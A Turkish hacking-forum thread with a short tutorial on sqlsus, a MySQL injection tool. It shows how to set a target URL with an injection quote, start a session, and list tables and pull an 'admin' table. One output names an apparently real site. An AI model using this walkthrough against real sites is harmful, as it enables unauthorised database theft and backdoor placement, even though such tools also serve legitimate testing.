Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.


SqlSus Kullanımı

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-01-2019 21:31   #1
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2017
Yaş
98
Mesajlar
Konular

Teşekkür (Etti): 105
Teşekkür (Aldı): 166


SqlSus Kullanımı



---SQLSUS HAKKINDA---
Sqlsus perl dili ile yazılımış açık kaynak kodlu MySQL enjeksiyon aracıdır .
veritabanı yapısını alabilir, kendi SQL sorgularınızı (hatta karmaşık olanlar) enjekte edebilir, web sunucusundan dosya indirebilir, yazılabilir dizinler için web sitesini tarayabilir, bir arka kapı yükleyebilir ve kontrol edebilir, veritabanını klonlayabilirsiniz ve daha fazlasını bile yapa bilirsiniz.

sqlsus, hız ve verimliliğe odaklanır, mevcut enjeksiyon alanını optimize eder, MySQL işlevlerinden en iyi şekilde yararlanır .
----
---SQLSUS---
Kod:
root@kali:~# sqlsus -h

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

Usage:
    sqlsus [options] [config file]

     Options:
         -h, --help                    brief help message
         -v, --version                 version information
         -e, --execute <commands>      execute commands and exit
         -g, --genconf <filename>      generate configuration file
Örnek kullanım
Kod:
root@kali:~# sqlsus -g sqlsus.cfg

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Configuration successfully saved to sqlsus.cfg
root@kali:~# nano sqlsus.cfg
Kod:
root@kali:~# sqlsus sqlsus.cfg

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Session "192.168.1.25" created
sqlsus> start
Video çekicektim ancak site bulamadım mlsf ....
Buradan anlatayım ..

sqlsus -g sqlsus.cfg komutu ile sqlsus.cfg dosyası oluşturuyoruz oluşturuduğumuz dosyanın içine girelim.

Kod:
our $url_start = "";
Böyle bir yazı görüceksinizdir .($url_start="") yerine hedef url yi giriyoruz ve kayıt ediyoruz.
Kod:
our $url_start = "http://localhost/script.php?id=1'";
Uçbirim'e(terminal'a)
Kod:
sqlsus /dosyanın_bulundu_dizin_/DOSYA.cfg
Çıktı:
Kod:
              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

start[+] Session "www.sedimental.com" created
sqlsus> start
sqlsus> olan yere star' diyoruz veri tabanlarını çekmiş oluyorsunuz bu sayede ondan sonrası sizde artık

get tables -> Tablolara erişim sağlar.
get colums -> Stünlara erişim sağlar.
selcet * form Colum -> Seçilen sütündan(colum)veri çekmeye sağlar.
Kod:
selcet * form admin

Konu ByKertenkele tarafından (06-01-2019 22:24 Saat 22:24 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 17-01-2019 16:16   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Mesajlar
Konular
5

Teşekkür (Etti): 13
Teşekkür (Aldı): 4




selcet * form Colum

bi an yanlış sandım
 Offline  
 
Alıntı ile Cevapla
Teşekkür

ByKertenkele Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau